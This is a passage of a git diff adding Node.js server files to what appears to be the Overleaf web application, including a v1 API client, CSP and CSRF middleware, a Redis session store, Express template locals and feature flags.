Array.from(options.expectedStatusCodes || []).includes( + response?.statusCode + ) + ) { + return callback(null, response, body) + } else if (response?.statusCode === 403) { + error = new Errors.ForbiddenError('overleaf v1 returned forbidden') + error.statusCode = response.statusCode + return callback(error) + } else if (response?.statusCode === 404) { + error = new Errors.NotFoundError( + `overleaf v1 returned non-success code: ${response.statusCode} ${options.method} ${options.uri}` + ) + error.statusCode = response.statusCode + return callback(error) + } else { + error = new Error( + `overleaf v1 returned non-success code: ${response?.statusCode} ${options.method} ${options.uri}` + ) + error.statusCode = response?.statusCode + return callback(error) + } + }, +} + +V1Api.promises = promisifyAll(V1Api, { + multiResult: { + request: ['response', 'body'], + oauthRequest: ['response', 'body'], + }, +}) +module.exports = V1Api diff --git a/services/web/app/src/Features/V1/V1Handler.mjs b/services/web/app/src/Features/V1/V1Handler.mjs new file mode 100644 index 0000000..7c5f2d3 --- /dev/null +++ b/services/web/app/src/Features/V1/V1Handler.mjs @@ -0,0 +1,90 @@ +/* eslint-disable + max-len, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import OError from '@overleaf/o-error' +import V1Api from './V1Api.js' +import logger from '@overleaf/logger' + +let V1Handler + +export default V1Handler = { + authWithV1(email, password, callback) { + return V1Api.request( + { + method: 'POST', + url: '/api/v1/overleaf/login', + json: { email, password }, + expectedStatusCodes: [403], + }, + function (err, response, body) { + if (err != null) { + OError.tag(err, '[V1Handler] error while talking to v1 login api', { + email, + }) + return callback(err) + } + if ([200, 403].includes(response.statusCode)) { + const isValid = body.valid + const userProfile = body.user_profile + logger.debug( + { + email, + isValid, + v1UserId: body?.user_profile?.id, + }, + '[V1Handler] got response from v1 login api' + ) + return callback(null, isValid, userProfile) + } else { + err = new Error( + `Unexpected status from v1 login api: ${response.statusCode}` + ) + return callback(err) + } + } + ) + }, + + doPasswordReset(v1UserId, password, callback) { + return V1Api.request( + { + method: 'POST', + url: '/api/v1/overleaf/reset_password', + json: { + user_id: v1UserId, + password, + }, + expectedStatusCodes: [200], + }, + function (err, response, body) { + if (err != null) { + OError.tag(err, 'error while talking to v1 password reset api', { + v1_user_id: v1UserId, + }) + return callback(err, false) + } + if ([200].includes(response.statusCode)) { + logger.debug( + { v1UserId, changed: true }, + 'got success response from v1 password reset api' + ) + return callback(null, true) + } else { + err = new Error( + `Unexpected status from v1 password reset api: ${response.statusCode}` + ) + return callback(err, false) + } + } + ) + }, +} diff --git a/services/web/app/src/infrastructure/BodyParserWrapper.js b/services/web/app/src/infrastructure/BodyParserWrapper.js new file mode 100644 index 0000000..544a7f2 --- /dev/null +++ b/services/web/app/src/infrastructure/BodyParserWrapper.js @@ -0,0 +1,35 @@ +const bodyParser = require('body-parser') +const HttpErrorHandler = require('../Features/Errors/HttpErrorHandler') + +function isBodyParserError(nextArg) { + if (nextArg instanceof Error) { + return ( + nextArg.statusCode && + nextArg.statusCode >= 400 && + nextArg.statusCode < 600 + ) + } + return false +} + +const wrapBodyParser = method => opts => { + const middleware = bodyParser[method](opts) + return function bodyParser(req, res, next) { + middleware(req, res, nextArg => { + if (isBodyParserError(nextArg)) { + return HttpErrorHandler.handleErrorByStatusCode( + req, + res, + nextArg, + nextArg.statusCode + ) + } + next(nextArg) + }) + } +} + +module.exports = { + urlencoded: wrapBodyParser('urlencoded'), + json: wrapBodyParser('json'), +} diff --git a/services/web/app/src/infrastructure/CSP.js b/services/web/app/src/infrastructure/CSP.js new file mode 100644 index 0000000..423154d --- /dev/null +++ b/services/web/app/src/infrastructure/CSP.js @@ -0,0 +1,134 @@ +const crypto = require('crypto') +const path = require('path') + +module.exports = function ({ + reportUri, + reportPercentage, + reportOnly = false, + exclude = [], + viewDirectives = {}, +}) { + const header = reportOnly + ? 'Content-Security-Policy-Report-Only' + : 'Content-Security-Policy' + + const defaultPolicy = buildDefaultPolicy(reportUri) + + return function (req, res, next) { + // set the default policy + res.set(header, defaultPolicy) + if (reportUri) { + res.set('Reporting-Endpoints', `csp-endpoint="${reportUri}"`) + } + + const originalRender = res.render + + res.render = (...args) => { + const view = relativeViewPath(args[0]) + + if (exclude.includes(view)) { + // remove the default policy + res.removeHeader(header) + res.removeHeader('Reporting-Endpoints') + } else { + // set the view policy + res.locals.cspEnabled = true + + const scriptNonce = crypto.randomBytes(16).toString('base64') + + res.locals.scriptNonce = scriptNonce + + const policy = buildViewPolicy( + scriptNonce, + reportPercentage, + reportUri, + viewDirectives[view] + ) + + // Note: https://csp-evaluator.withgoogle.com/ is useful for checking the policy + + res.set(header, policy) + } + + originalRender.apply(res, args) + } + + next() + } +} + +const buildDefaultPolicy = (reportUri, styleSrc) => { + const directives = [ + `base-uri 'none'`, // forbid setting a "base" element + `default-src 'none'`, // forbid loading anything from a "src" attribute + `form-action 'none'`, // forbid setting a form action + `frame-ancestors 'none'`, // forbid loading embedded content + `img-src 'self'`, // allow loading images from the same domain (e.g. the favicon). + ] + + if (reportUri) { + directives.push(`report-uri ${reportUri}`) + directives.push(`report-to csp-endpoint`) + } + + if (styleSrc) { + directives.push(`style-src ${styleSrc}`) + } + + return directives.join('; ') +} + +const buildViewPolicy = ( + scriptNonce, + reportPercentage, + reportUri, + viewDirectives +) => { + const directives = [ + `script-src 'nonce-${scriptNonce}' 'unsafe-inline' 'strict-dynamic' https: 'report-sample'`, // only allow scripts from certain sources + `object-src 'none'`, // forbid loading an "object" element + `base-uri 'none'`, // forbid setting a "base" element + ...(viewDirectives ?? []), + ] + + if (reportUri) { + // enable the report URI for a percentage of CSP-enabled requests + const belowReportCutoff = Math.random() * 100 <= reportPercentage + + if (belowReportCutoff) { + directives.push(`report-uri ${reportUri}`) + directives.push(`report-to csp-endpoint`) + } + } + + return directives.join('; ') +} + +const webRoot = path.resolve(__dirname, '..', '..', '..') + +// build the view path relative to the web root +function relativeViewPath(view) { + return path.isAbsolute(view) + ? path.relative(webRoot, view) + : path.join('app', 'views', view) +} + +function removeCSPHeaders(res) { + res.removeHeader('Content-Security-Policy') + res.removeHeader('Content-Security-Policy-Report-Only') +} + +/** + * WARNING: allowing inline styles can open a security hole; + * this is intended only for use in specific circumstances, such as Safari's built-in PDF viewer. + */ +function allowUnsafeInlineStyles(res) { + res.set( + 'Content-Security-Policy', + buildDefaultPolicy(undefined, "'unsafe-inline'") + ) +} + +module.exports.buildDefaultPolicy = buildDefaultPolicy +module.exports.removeCSPHeaders = removeCSPHeaders +module.exports.allowUnsafeInlineStyles = allowUnsafeInlineStyles diff --git a/services/web/app/src/infrastructure/CookieMetrics.js b/services/web/app/src/infrastructure/CookieMetrics.js new file mode 100644 index 0000000..9e35b51 --- /dev/null +++ b/services/web/app/src/infrastructure/CookieMetrics.js @@ -0,0 +1,30 @@ +const Settings = require('@overleaf/settings') +const metrics = require('@overleaf/metrics') + +/** + * Middleware function to record session cookie metrics. This allows us to + * detect whether users are sending valid signed cookies, cookies with invalid + * signatures (e.g. using an old key), or no cookies at all. + * + * Signed cookies begin with the prefix 's:'. If the signature fails to verify, + * the signed cookie value is returned as false. + */ +function middleware(req, res, next) { + const cookieName = Settings.cookieName + const cookie = req.cookies && req.cookies[cookieName] + const signedCookie = req.signedCookies && req.signedCookies[cookieName] + let status + if (signedCookie) { + status = 'signed' + } else if (signedCookie === false) { + status = 'bad-signature' + } else if (cookie) { + status = 'unsigned' + } else { + status = 'none' + } + metrics.inc('session.cookie', 1, { status }) + next() +} + +module.exports = { middleware } diff --git a/services/web/app/src/infrastructure/Csrf.js b/services/web/app/src/infrastructure/Csrf.js new file mode 100644 index 0000000..71fb3ac --- /dev/null +++ b/services/web/app/src/infrastructure/Csrf.js @@ -0,0 +1,114 @@ +/* eslint-disable + max-len, + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ + +const csurf = require('csurf') +const csrf = csurf() +const { promisify } = require('util') +const Settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') + +// Wrapper for `csurf` middleware that provides a list of routes that can be excluded from csrf checks. +// +// Include with `Csrf = require('./Csrf')` +// +// Add the middleware to the router with: +// myRouter.csrf = new Csrf() +// myRouter.use webRouter.csrf.middleware +// When building routes, specify a route to exclude from csrf checks with: +// myRouter.csrf.disableDefaultCsrfProtection "/path" "METHOD" +// +// To validate the csrf token in a request to ensure that it's valid, you can use `validateRequest`, which takes a +// request object and calls a callback with an error if invalid. + +class Csrf { + constructor() { + this.middleware = this.middleware.bind(this) + this.excluded_routes = {} + } + + static blockCrossOriginRequests() { + return function (req, res, next) { + const { origin } = req.headers + // NOTE: Only cross-origin requests must have an origin header set. + if (origin && !Settings.allowedOrigins.includes(origin)) { + logger.warn({ req }, 'blocking cross-origin request') + return res.sendStatus(403) + } + next() + } + } + + disableDefaultCsrfProtection(route, method) { + if (!this.excluded_routes[route]) { + this.excluded_routes[route] = {} + } + return (this.excluded_routes[route][method] = 1) + } + + middleware(req, res, next) { + // We want to call the middleware for all routes, even if excluded, because csurf sets up a csrfToken() method on + // the request, to get a new csrf token for any rendered forms. For excluded routes we'll then ignore a 'bad csrf + // token' error from csurf and continue on... + + // check whether the request method is excluded for the specified route + if ( + (this.excluded_routes[req.path] != null + ? this.excluded_routes[req.path][req.method] + : undefined) === 1 + ) { + // ignore the error if it's due to a bad csrf token, and continue + return csrf(req, res, err => { + if (err && err.code !== 'EBADCSRFTOKEN') { + return next(err) + } else { + return next() + } + }) + } else { + return csrf(req, res, next) + } + } + + static validateRequest(req, cb) { + // run a dummy csrf check to see if it returns an error + if (cb == null) { + cb = function (valid) {} + } + return csrf(req, null, err => cb(err)) + } + + static validateToken(token, session, cb) { + if (token == null) { + return cb(new Error('missing token')) + } + // run a dummy csrf check to see if it returns an error + // use this to simulate a csrf check regardless of req method, headers &c. + const req = { + body: { + _csrf: token, + }, + headers: {}, + method: 'POST', + session, + } + return Csrf.validateRequest(req, cb) + } +} + +Csrf.promises = { + validateRequest: promisify(Csrf.validateRequest), + validateToken: promisify(Csrf.validateToken), +} + +module.exports = Csrf diff --git a/services/web/app/src/infrastructure/CustomSessionStore.js b/services/web/app/src/infrastructure/CustomSessionStore.js new file mode 100644 index 0000000..5c81105 --- /dev/null +++ b/services/web/app/src/infrastructure/CustomSessionStore.js @@ -0,0 +1,165 @@ +const session = require('express-session') +const RedisStore = require('connect-redis')(session) +const metrics = require('@overleaf/metrics') +const logger = require('@overleaf/logger') +const Settings = require('@overleaf/settings') +const SessionManager = require('../Features/Authentication/SessionManager') +const Metrics = require('@overleaf/metrics') + +const MAX_SESSION_SIZE_THRESHOLD = 4096 + +// Define a custom session store to record session metrics and log large +// anonymous sessions for debugging purposes +// Also make the SET calls more robust/consistent by adding flags +// - XX: ensure update in place, expect that the old session value is still in redis at that key +// - NX: ensure initial set, expect that there is no other session at that key already +class CustomSessionStore extends RedisStore { + static largestSessionSize = 3 * 1024 // ignore sessions smaller than 3KB + #initialSetStore + #updateInPlaceStore + + constructor({ client }) { + super({ client }) + this.#initialSetStore = new RedisStore({ + client: new CustomSetRedisClient(client, 'NX'), + }) + this.#updateInPlaceStore = new RedisStore({ + client: new CustomSetRedisClient(client, 'XX'), + }) + } + + static metric(method, sess) { + let type // type of session: 'logged-in', 'anonymous', or 'na' (not available) + if (sess) { + type = SessionManager.isUserLoggedIn(sess) ? 'logged-in' : 'anonymous' + } else { + type = 'na' + } + const size = sess ? JSON.stringify(sess).length : 0 + // record the number of redis session operations + metrics.inc('session.store.count', 1, { + method, + type, + status: size > MAX_SESSION_SIZE_THRESHOLD ? 'oversize' : 'normal', + }) + // record the redis session bandwidth for get/set operations + if (method === 'get' || method === 'set') { + metrics.count('session.store.bytes', size, { method, type }) + } + // log the largest anonymous session seen so far + if (type === 'anonymous' && size > CustomSessionStore.largestSessionSize) { + CustomSessionStore.largestSessionSize = size + logger.warn( + { redactedSession: redactSession(sess), largestSessionSize: size }, + 'largest session size seen' + ) + } + } + + get(sid, cb) { + super.get(sid, (err, sess) => { + if (err || !sess || !checkValidationToken(sid, sess)) return cb(err, null) + CustomSessionStore.metric('get', sess) + cb(null, sess) + }) + } + + set(sid, sess, cb) { + // Refresh the validation token just before writing to Redis + // This will ensure that the token is always matching to the sessionID that we write the session value for. + // Potential reasons for missing/mismatching token: + // - brand-new session + // - cycling of the sessionID as part of the login flow + // - upgrade from a client side session to a redis session + // - accidental writes in the app code + sess.validationToken = computeValidationToken(sid) + + CustomSessionStore.metric('set', sess) + const originalId = sess.req.signedCookies[Settings.cookieName] + if (sid === originalId || sid === sess.req.newSessionId) { + this.#updateInPlaceStore.set(sid, sess, cb) + } else { + Metrics.inc('security.session', 1, { status: 'new' }) + // Multiple writes can get issued with the new sid. Keep track of it. + Object.defineProperty(sess.req, 'newSessionId', { value: sid }) + this.#initialSetStore.set(sid, sess, cb) + } + } + + touch(sid, sess, cb) { + CustomSessionStore.metric('touch', sess) + super.touch(sid, sess, cb) + } + + destroy(sid, cb) { + // for the destroy method we don't have access to the session object itself + CustomSessionStore.metric('destroy') + super.destroy(sid, cb) + } +} + +function computeValidationToken(sid) { + // This should be a deterministic function of the client-side sessionID, + // prepended with a version number in case we want to change it later. + return 'v1:' + sid.slice(-4) +} + +function checkValidationToken(sid, sess) { + const sessionToken = sess.validationToken + if (sessionToken) { + const clientToken = computeValidationToken(sid) + // Reject sessions where the validation token is out of sync with the sessionID. + // If you change the method for computing the token (above) then you need to either check or ignore previous versions of the token. + if (sessionToken === clientToken) { + Metrics.inc('security.session', 1, { status: 'ok' }) + return true + } else { + logger.warn( + { sid, sessionToken, clientToken }, + 'session token validation failed' + ) + Metrics.inc('security.session', 1, { status: 'error' }) + return false + } + } else { + Metrics.inc('security.session', 1, { status: 'missing' }) + return false + } +} + +// Helper function to return a redacted version of session object +// so we can identify the largest keys without exposing sensitive +// data +function redactSession(sess) { + // replace all string values with '***' of the same length + return JSON.parse( + JSON.stringify(sess, (key, value) => { + if (typeof value === 'string') { + return '*'.repeat(value.length) + } + return value + }) + ) +} + +class CustomSetRedisClient { + #client + #flag + constructor(client, flag) { + this.#client = client + this.#flag = flag + } + + set(args, cb) { + args.push(this.#flag) + this.#client.set(args, (err, ok) => { + metrics.inc('session.store.set', 1, { + path: this.#flag, + status: err ? 'error' : ok ? 'success' : 'failure', + }) + cb(err, ok) + }) + } +} + +module.exports = CustomSessionStore diff --git a/services/web/app/src/infrastructure/ExpressLocals.js b/services/web/app/src/infrastructure/ExpressLocals.js new file mode 100644 index 0000000..eae1b48 --- /dev/null +++ b/services/web/app/src/infrastructure/ExpressLocals.js @@ -0,0 +1,437 @@ +const logger = require('@overleaf/logger') +const Metrics = require('@overleaf/metrics') +const Settings = require('@overleaf/settings') +const _ = require('lodash') +const { URL } = require('url') +const Path = require('path') +const moment = require('moment') +const { fetchJson } = require('@overleaf/fetch-utils') +const contentDisposition = require('content-disposition') +const Features = require('./Features') +const SessionManager = require('../Features/Authentication/SessionManager') +const PackageVersions = require('./PackageVersions') +const Modules = require('./Modules') +const Errors = require('../Features/Errors/Errors') +const { + canRedirectToAdminDomain, + hasAdminAccess, +} = require('../Features/Helpers/AdminAuthorizationHelper') +const { + addOptionalCleanupHandlerAfterDrainingConnections, +} = require('./GracefulShutdown') + +const IEEE_BRAND_ID = Settings.ieeeBrandId + +let webpackManifest +function loadManifest() { + switch (process.env.NODE_ENV) { + case 'production': + // Only load webpack manifest file in production. + webpackManifest = require('../../../public/manifest.json') + break + case 'development': { + // In dev, fetch the manifest from the webpack container. + loadManifestFromWebpackDevServer() + const intervalHandle = setInterval( + loadManifestFromWebpackDevServer, + 10 * 1000 + ) + addOptionalCleanupHandlerAfterDrainingConnections( + 'refresh webpack manifest', + () => { + clearInterval(intervalHandle) + } + ) + break + } + default: + // In ci, all entries are undefined. + webpackManifest = {} + } +} +function loadManifestFromWebpackDevServer(done = function () {}) { + fetchJson(new URL(`/manifest.json`, Settings.apis.webpack.url), { + headers: { + Host: 'localhost', + }, + }) + .then(json => { + webpackManifest = json + done() + }) + .catch(error => { + logger.err({ error }, 'cannot fetch webpack manifest') + done(error) + }) +} +const IN_CI = process.env.NODE_ENV === 'test' +function getWebpackAssets(entrypoint, section) { + if (IN_CI) { + // Emit an empty list of entries in CI. + return [] + } + return webpackManifest.entrypoints[entrypoint].assets[section] || [] +} + +module.exports = function (webRouter, privateApiRouter, publicApiRouter) { + loadManifest() + if (process.env.NODE_ENV === 'development') { + // In the dev-env, delay requests until we fetched the manifest once. + webRouter.use(function (req, res, next) { + if (!webpackManifest) { + loadManifestFromWebpackDevServer(next) + } else { + next() + } + }) + } + + webRouter.use(function (req, res, next) { + res.locals.session = req.session + next() + }) + + function addSetContentDisposition(req, res, next) { + res.setContentDisposition = function (type, { filename }) { + res.setHeader( + 'Content-Disposition', + contentDisposition(filename, { type }) + ) + } + next() + } + webRouter.use(addSetContentDisposition) + privateApiRouter.use(addSetContentDisposition) + publicApiRouter.use(addSetContentDisposition) + + webRouter.use(function (req, res, next) { + req.externalAuthenticationSystemUsed = + Features.externalAuthenticationSystemUsed + res.locals.externalAuthenticationSystemUsed = + Features.externalAuthenticationSystemUsed + req.hasFeature = res.locals.hasFeature = Features.hasFeature + next() + }) + + webRouter.use(function (req, res, next) { + let staticFilesBase + + const cdnAvailable = + Settings.cdn && Settings.cdn.web && !!Settings.cdn.web.host + const cdnBlocked = + req.query.nocdn === 'true' || req.session.cdnBlocked || false + const userId = SessionManager.getLoggedInUserId(req.session) + if (cdnBlocked && req.session.cdnBlocked == null) { + logger.debug( + { userId, ip: req != null ? req.ip : undefined }, + 'cdnBlocked for user, not using it and turning it off for future requets' + ) + Metrics.inc('no_cdn', 1, { + path: userId ? 'logged-in' : 'pre-login', + method: 'true', + }) + req.session.cdnBlocked = true + } + Metrics.inc('cdn_blocked', 1, { + path: userId ? 'logged-in' : 'pre-login', + method: String(cdnBlocked), + }) + const host = req.headers && req.headers.host + const isSmoke = host.slice(0, 5).toLowerCase() === 'smoke' + if (cdnAvailable && !isSmoke && !cdnBlocked) { + staticFilesBase = Settings.cdn.web.host + } else { + staticFilesBase = '' + } + + res.locals.buildBaseAssetPath = function () { + // Return the base asset path (including the CDN url) so that webpack can + // use this to dynamically fetch scripts (e.g. PDFjs worker) + return staticFilesBase + '/' + } + + res.locals.buildJsPath = function (jsFile) { + return staticFilesBase + webpackManifest[jsFile] + } + + res.locals.buildCopiedJsAssetPath = function (jsFile) { + return staticFilesBase + (webpackManifest[jsFile] || '/' + jsFile) + } + + let runtimeEmitted = false + const runtimeChunk = webpackManifest['runtime.js'] + res.locals.entrypointScripts = function (entrypoint) { + // Each "entrypoint" contains the runtime chunk as imports. + // Loading the entrypoint twice results in broken execution. + let chunks = getWebpackAssets(entrypoint, 'js') + if (runtimeEmitted) { + chunks = chunks.filter(chunk => chunk !== runtimeChunk) + } + runtimeEmitted = true + return chunks.map(chunk => staticFilesBase + chunk) + } + + res.locals.entrypointStyles = function (entrypoint) { + const chunks = getWebpackAssets(entrypoint, 'css') + return chunks.map(chunk => staticFilesBase + chunk) + } + + res.locals.mathJaxPath = `/js/libs/mathjax-${PackageVersions.version.mathjax}/es5/tex-svg-full.js` + res.locals.dictionariesRoot = `/js/dictionaries/${PackageVersions.version.dictionaries}/` + + res.locals.lib = PackageVersions.lib + + res.locals.moment = moment + + res.locals.isIEEE = brandId => brandId === IEEE_BRAND_ID + + res.locals.getCssThemeModifier = function ( + userSettings, + brandVariation, + enableIeeeBranding + ) { + // Themes only exist in OL v2 + if (Settings.overleaf != null) { + // The IEEE theme is no longer applied in the editor, which sets + // enableIeeeBranding to false, but is used in the IEEE portal. If + // this is an IEEE-branded page and IEEE branding is disabled in this + // page, always use the default theme (i.e. no light theme in the + // IEEE-branded editor) + if (res.locals.isIEEE(brandVariation?.brand_id)) { + return enableIeeeBranding ? 'ieee-' : '' + } else if (userSettings && userSettings.overallTheme != null) { + return userSettings.overallTheme + } + } + return '' + } + + res.locals.buildStylesheetPath = function (cssFileName) { + return staticFilesBase + webpackManifest[cssFileName] + } + + res.locals.buildCssPath = function ( + themeModifier = '', + bootstrapVersion = 3 + ) { + // Pick which main stylesheet to use based on Bootstrap version + return res.locals.buildStylesheetPath( + bootstrapVersion === 5 + ? 'main-style-bootstrap-5.css' + : `main-${themeModifier}style.css` + ) + } + + res.locals.buildImgPath = function (imgFile) { + const path = Path.join('/img/', imgFile) + return staticFilesBase + path + } + + next() + }) + + webRouter.use(function (req, res, next) { + res.locals.translate = req.i18n.translate + + const addTranslatedTextDeep = obj => { + if (_.isObject(obj)) { + if (_.has(obj, 'text')) { + obj.translatedText = req.i18n.translate(obj.text) + } + _.forOwn(obj, value => { + addTranslatedTextDeep(value) + }) + } + } + + // This function is used to add translations from the server for main + // navigation and footer items because it's tricky to get them in the front + // end otherwise. + res.locals.cloneAndTranslateText = obj => { + const clone = _.cloneDeep(obj) + addTranslatedTextDeep(clone) + return clone + } + + // Don't include the query string parameters, otherwise Google + // treats ?nocdn=true as the canonical version + try { + const parsedOriginalUrl = new URL(req.originalUrl, Settings.siteUrl) + res.locals.currentUrl = parsedOriginalUrl.pathname + res.locals.currentUrlWithQueryParams = + parsedOriginalUrl.pathname + parsedOriginalUrl.search + } catch (err) { + return next(new Errors.InvalidError()) + } + res.locals.capitalize = function (string) { + if (string.length === 0) { + return '' + } + return string.charAt(0).toUpperCase() + string.slice(1) + } + next() + }) + + webRouter.use(function (req, res, next) { + res.locals.getUserEmail = function () { + const user = SessionManager.getSessionUser(req.session) + const email = (user != null ? user.email : undefined) || '' + return email + } + next() + }) + + webRouter.use(function (req, res, next) { + res.locals.StringHelper = require('../Features/Helpers/StringHelper') + next() + }) + + webRouter.use(function (req, res, next) { + res.locals.csrfToken = req != null ? req.csrfToken() : undefined + next() + }) + + webRouter.use(function (req, res, next) { + res.locals.getReqQueryParam = field => + req.query != null ? req.query[field] : undefined + next() + }) + + webRouter.use(function (req, res, next) { + const currentUser = SessionManager.getSessionUser(req.session) + if (currentUser != null) { + res.locals.user = { + email: currentUser.email, + first_name: currentUser.first_name, + last_name: currentUser.last_name, + } + } + next() + }) + + webRouter.use(function (req, res, next) { + res.locals.getLoggedInUserId = () => + SessionManager.getLoggedInUserId(req.session) + res.locals.getSessionUser = () => SessionManager.getSessionUser(req.session) + res.locals.canRedirectToAdminDomain = () => + canRedirectToAdminDomain(SessionManager.getSessionUser(req.session)) + res.locals.hasAdminAccess = () => + hasAdminAccess(SessionManager.getSessionUser(req.session)) + next() + }) + + webRouter.use(function (req, res, next) { + // Clone the nav settings so they can be modified for each request + res.locals.nav = {} + for (const key in Settings.nav) { + res.locals.nav[key] = _.clone(Settings.nav[key]) + } + res.locals.templates = Settings.templateLinks + next() + }) + + webRouter.use(function (req, res, next) { + if (Settings.reloadModuleViewsOnEachRequest) { + Modules.loadViewIncludes(req.app) + } + res.locals.moduleIncludes = Modules.moduleIncludes + res.locals.moduleIncludesAvailable = Modules.moduleIncludesAvailable + next() + }) + + webRouter.use(function (req, res, next) { + // TODO + if (Settings.overleaf != null) { + res.locals.overallThemes = [ + { + name: 'Default', + val: '', + path: res.locals.buildCssPath(), + }, + { + name: 'Light', + val: 'light-', + path: res.locals.buildCssPath('light-'), + }, + ] + } + next() + }) + + webRouter.use(function (req, res, next) { + res.locals.settings = Settings + next() + }) + + webRouter.use(function (req, res, next) { + res.locals.showThinFooter = !Features.hasFeature('saas') + next() + }) + + webRouter.use(function (req, res, next) { + res.locals.bootstrap5Override = + req.query['bootstrap-5-override'] === 'enabled' + next() + }) + + webRouter.use(function (req, res, next) { + res.locals.websiteRedesignOverride = req.query.redesign === 'enabled' + next() + }) + + webRouter.use(function (req, res, next) { + res.locals.ExposedSettings = { + isOverleaf: Settings.overleaf != null, + appName: Settings.appName, + adminEmail: Settings.adminEmail, + dropboxAppName: + Settings.apis.thirdPartyDataStore?.dropboxAppName || 'Overleaf', + ieeeBrandId: IEEE_BRAND_ID, + hasSamlBeta: req.session.samlBeta, + hasAffiliationsFeature: Features.hasFeature('affiliations'), + hasSamlFeature: Features.hasFeature('saml'), + samlInitPath: _.get(Settings, ['saml', 'ukamf', 'initPath']), + hasLinkUrlFeature: Features.hasFeature('link-url'), + hasLinkedProjectFileFeature: Features.hasFeature('linked-project-file'), + hasLinkedProjectOutputFileFeature: Features.hasFeature( + 'linked-project-output-file' + ), + siteUrl: Settings.siteUrl, + emailConfirmationDisabled: Settings.emailConfirmationDisabled, + maxEntitiesPerProject: Settings.maxEntitiesPerProject, + maxUploadSize: Settings.maxUploadSize, + projectUploadTimeout: Settings.projectUploadTimeout, + recaptchaSiteKey: Settings.recaptcha?.siteKey, + recaptchaSiteKeyV3: Settings.recaptcha?.siteKeyV3, + recaptchaDisabled: Settings.recaptcha?.disabled, + textExtensions: Settings.textExtensions, + editableFilenames: Settings.editableFilenames, + validRootDocExtensions: Settings.validRootDocExtensions, + fileIgnorePattern: Settings.fileIgnorePattern, + sentryAllowedOriginRegex: Settings.sentry.allowedOriginRegex, + sentryDsn: Settings.sentry.publicDSN, + sentryEnvironment: Settings.sentry.environment, + sentryRelease: Settings.sentry.release, + hotjarId: Settings.hotjar?.id, + hotjarVersion: Settings.hotjar?.version, + enableSubscriptions: Settings.enableSubscriptions, + gaToken: + Settings.analytics && + Settings.analytics.ga && + Settings.analytics.ga.token, + gaTokenV4: + Settings.analytics && + Settings.analytics.ga && + Settings.analytics.ga.tokenV4, + cookieDomain: Settings.cookieDomain, + templateLinks: Settings.templateLinks, + labsEnabled: Settings.labs && Settings.labs.enable, + wikiEnabled: Settings.overleaf != null || Settings.proxyLearn, + templatesEnabled: + Settings.overleaf != null || Settings.templates?.user_id != null, + cioWriteKey: Settings.analytics?.cio?.writeKey, + cioSiteId: Settings.analytics?.cio?.siteId, + } + next() + }) +} diff --git a/services/web/app/src/infrastructure/Features.js b/services/web/app/src/infrastructure/Features.js new file mode 100644 index 0000000..aaf5110 --- /dev/null +++ b/services/web/app/src/infrastructure/Features.js @@ -0,0 +1,107 @@ +const _ = require('lodash') +const Settings = require('@overleaf/settings') + +const supportModuleAvailable = Settings.moduleImportSequence.includes('support') + +const symbolPaletteModuleAvailable = + Settings.moduleImportSequence.includes('symbol-palette') + +const trackChangesModuleAvailable = + Settings.moduleImportSequence.includes('track-changes') + +/** + * @typedef {Object} Settings + * @property {Object | undefined} apis + * @property {Object | undefined} apis.linkedUrlProxy + * @property {string | undefined} apis.linkedUrlProxy.url + * @property {Object | undefined} apis.references + * @property {string | undefined} apis.references.url + * @property {boolean | undefined} enableGithubSync + * @property {boolean | undefined} enableGitBridge + * @property {boolean | undefined} enableHomepage + * @property {boolean | undefined} enableProjectHistoryBlobs + * @property {boolean | undefined} disableFilestore + * @property {boolean | undefined} enableSaml + * @property {boolean | undefined} ldap + * @property {boolean | undefined} oauth + * @property {Object | undefined} overleaf + * @property {Object | undefined} overleaf.oauth + * @property {boolean | undefined} saml + */ + +const Features = { + /** + * @returns {boolean} + */ + externalAuthenticationSystemUsed() { + return ( + (Boolean(Settings.ldap) && Boolean(Settings.ldap.enable)) || + (Boolean(Settings.saml) && Boolean(Settings.saml.enable)) || + Boolean(Settings.overleaf) + ) + }, + + /** + * Whether a feature is enabled in the appliation's configuration + * + * @param {string} feature + * @returns {boolean} + */ + hasFeature(feature) { + switch (feature) { + case 'saas': + return Boolean(Settings.overleaf) + case 'homepage': + return Boolean(Settings.enableHomepage) + case 'registration-page': + return ( + !Features.externalAuthenticationSystemUsed() || + Boolean(Settings.overleaf) + ) + case 'registration': + return Boolean(Settings.overleaf) + case 'chat': + return Boolean(Settings.disableChat) === false + case 'github-sync': + return Boolean(Settings.enableGithubSync) + case 'git-bridge': + return Boolean(Settings.enableGitBridge) + case 'oauth': + return Boolean(Settings.oauth) + case 'templates-server-pro': + return Boolean(Settings.templates?.user_id) + case 'affiliations': + case 'analytics': + return Boolean(_.get(Settings, ['apis', 'v1', 'url'])) + case 'references': + return Boolean(_.get(Settings, ['apis', 'references', 'url'])) + case 'saml': + return Boolean(Settings.enableSaml) + case 'linked-project-file': + return Boolean(Settings.enabledLinkedFileTypes.includes('project_file')) + case 'linked-project-output-file': + return Boolean( + Settings.enabledLinkedFileTypes.includes('project_output_file') + ) + case 'link-url': + return Boolean( + _.get(Settings, ['apis', 'linkedUrlProxy', 'url']) && + Settings.enabledLinkedFileTypes.includes('url') + ) + case 'project-history-blobs': + return Boolean(Settings.enableProjectHistoryBlobs) + case 'filestore': + return Boolean(Settings.disableFilestore) === false + case 'support': + return supportModuleAvailable + case 'symbol-palette': + return symbolPaletteModuleAvailable + case 'track-changes': + return trackChangesModuleAvailable + default: + throw new Error(`unknown feature: ${feature}`) + } + }, +} + +module.exports = Features diff --git a/services/web/app/src/infrastructure/FileWriter.js b/services/web/app/src/infrastructure/FileWriter.js new file mode 100644 index 0000000..2c98028 --- /dev/null +++ b/services/web/app/src/infrastructure/FileWriter.js @@ -0,0 +1,179 @@ +/* eslint-disable + n/handle-callback-err, + max-len, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const fs = 